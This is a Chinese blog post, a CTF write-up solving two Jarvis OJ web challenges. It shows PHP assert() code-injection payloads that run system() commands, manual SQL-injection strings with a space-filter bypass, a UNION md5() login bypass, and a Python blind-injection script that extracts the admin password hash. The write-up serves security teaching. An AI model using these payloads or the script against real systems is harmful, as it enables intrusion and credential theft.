<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ashin9.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="babyphp描述里面发现使用了 Git，直接御剑爆破出 .git 目录。利用工具扒下源码，审计一波。 源码： 123456789101112&lt;?phpif (isset($_GET[&amp;#x27;page&amp;#x27;])) &amp;#123;    $page &#x3D; $_GET[&amp;#x27;page&amp;#x27;];&amp;#125; else &amp;#123;    $page &#x3D; &quot;home&amp;qu">
<meta property="og:type" content="article">
<meta property="og:title" content="Jarvis OJ Web WriteUp(2)">
<meta property="og:url" content="https://ashin9.github.io/2018/09/27/Jarvis%20OJ%20Web%20WriteUp(2)/index.html">
<meta property="og:site_name" content="Ashing&#39;s Blog">
<meta property="og:description" content="babyphp描述里面发现使用了 Git，直接御剑爆破出 .git 目录。利用工具扒下源码，审计一波。 源码： 123456789101112&lt;?phpif (isset($_GET[&amp;#x27;page&amp;#x27;])) &amp;#123;    $page &#x3D; $_GET[&amp;#x27;page&amp;#x27;];&amp;#125; else &amp;#123;    $page &#x3D; &quot;home&amp;qu">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2018-09-27T13:53:02.000Z">
<meta property="article:modified_time" content="2023-03-15T03:21:36.797Z">
<meta property="article:author" content="Ashing">
<meta property="article:tag" content="WriteUp">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ashin9.github.io/2018/09/27/Jarvis%20OJ%20Web%20WriteUp(2)/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Jarvis OJ Web WriteUp(2) | Ashing's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ashing's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">想学的太多 懂得的太少</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ashin9.github.io/2018/09/27/Jarvis%20OJ%20Web%20WriteUp(2)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/dxx.jpg">
      <meta itemprop="name" content="Ashing">
      <meta itemprop="description" content="Cyber Security">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ashing's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Jarvis OJ Web WriteUp(2)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2018-09-27 21:53:02" itemprop="dateCreated datePublished" datetime="2018-09-27T21:53:02+08:00">2018-09-27</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-03-15 11:21:36" itemprop="dateModified" datetime="2023-03-15T11:21:36+08:00">2023-03-15</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h4 id="babyphp"><a href="#babyphp" class="headerlink" title="babyphp"></a>babyphp</h4><p>描述里面发现使用了 Git，直接御剑爆破出 .git 目录。利用工具扒下源码，审计一波。 源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;page&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$page</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;page&#x27;</span>];</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="variable">$page</span> = <span class="string">&quot;home&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span> = <span class="string">&quot;templates/&quot;</span> . <span class="variable">$page</span> . <span class="string">&quot;.php&quot;</span>;</span><br><span class="line"><span class="comment">// I heard &#x27;..&#x27; is dangerous!</span></span><br><span class="line"><span class="title function_ invoke__">assert</span>(<span class="string">&quot;strpos(&#x27;<span class="subst">$file</span>&#x27;, &#x27;..&#x27;) === false&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;Detected hacking attempt!&quot;</span>);</span><br><span class="line"><span class="comment">// <span class="doctag">TODO:</span> Make this look nice</span></span><br><span class="line"><span class="title function_ invoke__">assert</span>(<span class="string">&quot;file_exists(&#x27;<span class="subst">$file</span>&#x27;)&quot;</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;That file doesn&#x27;t exist!&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>assert 函数果断是常见的危险函数。如果第一个参数是字符串会当作为代码执行。构造payload：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span>/<span class="regexp">/web.jarvisoj.com:32798/</span><span class="string">?p</span>age=flag<span class="string">&#x27;.system(&quot;ls templates/;&quot;).&#x27;</span> <span class="symbol">http:</span>/<span class="regexp">/web.jarvisoj.com:32798/</span><span class="string">?p</span>age=flag<span class="string">&#x27;.system(&quot;cat templates/flag.php;&quot;).&#x27;</span></span><br></pre></td></tr></table></figure>

<p>也可以利用注释掉后面的语句构造payload。</p>
<h4 id="simple-injection"><a href="#simple-injection" class="headerlink" title="simple injection"></a>simple injection</h4><p>上来一脸懵逼，post注入直接上 sqlmap，发现有 waf。然后s qlmap 绕过 waf 还不会。。。只能手动了。。。 </p>
<p>常规测试: </p>
<ul>
<li><p>1.先常规测试一下： <code>username=admin&#39;#</code> 密码随便填，发现报错密码错误。验证了没有过滤’#，而且存在报错注入。</p>
</li>
<li><p>2.然后尝试: <code>admin&#39; order by 1#</code> 发现说用户不存在，那么就说明有waf过滤了空格或order或by中至少一个。 </p>
</li>
<li><p>3.先猜测空格吧： 把空格换成&#x2F;<strong>&#x2F;，提示密码错误。ok绕过过滤空格。</strong></p>
</li>
<li><p>4.测试一下万能密码： <code>admin&#39;/**/or/**/1=1#</code>提示密码错误，没有过滤or。但是存在密码验证，万能密码不能用。 常见的登陆漏洞类型： </p>
<ul>
<li>①同时验证用户名和密码：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span> = select * <span class="keyword">from</span> users where    username=<span class="variable">$usernmae</span> <span class="keyword">and</span> password=<span class="variable">$password</span></span><br><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$result</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;登陆成功&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;登陆失败&quot;</span>;</span><br><span class="line">&#125;  </span><br></pre></td></tr></table></figure>

<ul>
<li>②分布验证用户名和密码：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;select password from users where username=&#x27;<span class="subst">$username</span>&#x27;&quot;</span></span><br><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$result</span>) &#123;</span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_row</span>(<span class="variable">$result</span>);</span><br><span class="line"><span class="variable">$query_password</span> = <span class="variable">$row</span>[<span class="variable">$password</span>];</span><br><span class="line"></span><br><span class="line"><span class="comment"># 对输入的$password进行变形</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$input_password</span> = <span class="title function_ invoke__">modify</span>(<span class="variable">$passowrd</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$input_password</span> == <span class="variable">$query_password</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;登陆成功&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;密码错误&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;用户不存在&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ul>
<p>分别尝试使用：</p>
<pre><code>username=admin&amp;password=123456#密码错误
username=user&amp;password=123456#用户名错误
</code></pre>
<p>即此题为分步验证。 </p>
<ul>
<li>5.开始盲注 <ul>
<li>5.1查找表： <code>username=user&#39;/**/or/**/exists(select/**/*/**/from/**/admin)#&amp;password=123456</code>返回密码错误，那么说明在数据库中存在admin表。</li>
<li>5.2查找字段： <code>username=user&#39;/**/or/**/exists(select/**/username,password/**/from/**/admin)#&amp;password=123456</code> 返回密码错误，说明admin中存在username和password字段 <code>username=user&#39;/**/or/**/exists(select/**/count(*)/**/from/**/admin)#&amp;password=123456</code> 返回密码错误，说明在admin表中仅仅只存在一条记录。 得到pasaword长度： <code>username=user&#39;/**/or/**/(select/**/length(password)/**/from/**/admin)&gt;10#&amp;password=123456</code>，通过二分法最终发现password长度为32.即采用md5来加密的。 py脚本跑一下：</li>
</ul>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>(): </span><br><span class="line">    result=<span class="string">&quot;&quot;</span></span><br><span class="line">    url=<span class="string">&quot;http://web.jarvisoj.com:32787/login.php&quot;</span></span><br><span class="line">data=&#123;</span><br><span class="line">    <span class="string">&#x27;username&#x27;</span>:<span class="string">&#x27;xx&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;password&#x27;</span>:<span class="string">&#x27;123456&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">payload=<span class="string">&quot;&#x27;/**/or/**/ascii(substr((select/**/password/**/from/**/admin),&#123;0&#125;,1))&gt;&#123;1&#125;#&quot;</span></span><br><span class="line">chars=<span class="string">&quot;0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">33</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> chars:</span><br><span class="line">        char_ascii=<span class="built_in">ord</span>(j)</span><br><span class="line">        sql_payload=payload.<span class="built_in">format</span>(i,char_ascii)</span><br><span class="line">        data[<span class="string">&#x27;username&#x27;</span>]=sql_payload</span><br><span class="line">        <span class="comment">#因为注入点在username上</span></span><br><span class="line">        rep=requests.post(url=url,data=data)</span><br><span class="line">        length=<span class="built_in">len</span>(rep.text)</span><br><span class="line">        <span class="keyword">if</span> length&gt;<span class="number">1191</span>:</span><br><span class="line">            result+=j</span><br><span class="line">            <span class="built_in">print</span> result</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"><span class="built_in">print</span> result</span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;Done&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">main()</span><br></pre></td></tr></table></figure>

<p>得出MD5破解后登陆得flag。 </p>
<p>在网上还流产一种解法比较骚： </p>
<ul>
<li><p>常规测试后猜测： 通过用户名查询密码，然后如果查不出行就提示用户名错误，如果查出了且密码匹配不对，就提示密码错误。 </p>
</li>
<li><p>然后直接用联合查询把后面带入user查询password得语句注释掉而是使用查询1： <code>username=admin123&#39;UNION(SELECT(1))#&amp;password=123</code> 返回密码错误，说明语句执行成功。</p>
</li>
<li><p>然后尝试把密码改为1提交不正确，猜测后端使用了MD5加密进行比较。因此构造语句： <code>username=admin123&#39;UNION(SELECT(md5(123)))#&amp;password=123</code> 得flag。</p>
<p>太骚啦~！！ 通过控制查询到得MD5值，再输入一个匹配得密码使其登陆成功。</p>
</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/WriteUp/" rel="tag"># WriteUp</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2018/09/27/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%88%90%E5%9B%A0%E5%8F%8A%E5%88%A9%E7%94%A8/" rel="prev" title="反序列化漏洞的成因及利用">
      <i class="fa fa-chevron-left"></i> 反序列化漏洞的成因及利用
    </a></div>
      <div class="post-nav-item">
    <a href="/2018/10/18/Session%E5%BA%8F%E5%88%97%E5%8C%96%E5%8F%8A%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%A4%84%E7%90%86%E5%99%A8%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/" rel="next" title="Session序列化及反序列化处理器的安全问题">
      Session序列化及反序列化处理器的安全问题 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#babyphp"><span class="nav-number">1.</span> <span class="nav-text">babyphp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#simple-injection"><span class="nav-number">2.</span> <span class="nav-text">simple injection</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ashing"
      src="/images/dxx.jpg">
  <p class="site-author-name" itemprop="name">Ashing</p>
  <div class="site-description" itemprop="description">Cyber Security</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ashin9" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ashin9" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:ashin9@foxmail.com" title="E-Mail → mailto:ashin9@foxmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://ttonys.github.io/" title="https:&#x2F;&#x2F;ttonys.github.io&#x2F;" rel="noopener" target="_blank">tongs</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://j0k3r.top/" title="http:&#x2F;&#x2F;j0k3r.top&#x2F;" rel="noopener" target="_blank">joker</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://daolgts.github.io/" title="https:&#x2F;&#x2F;daolgts.github.io" rel="noopener" target="_blank">daolgts</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://wzt.ac.cn/" title="https:&#x2F;&#x2F;wzt.ac.cn&#x2F;" rel="noopener" target="_blank">CataLpa</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://asa9ao.xyz/" title="http:&#x2F;&#x2F;asa9ao.xyz&#x2F;" rel="noopener" target="_blank">Asa9ao</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://v0w.top/" title="https:&#x2F;&#x2F;v0w.top" rel="noopener" target="_blank">vOw</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2018 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ashing</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
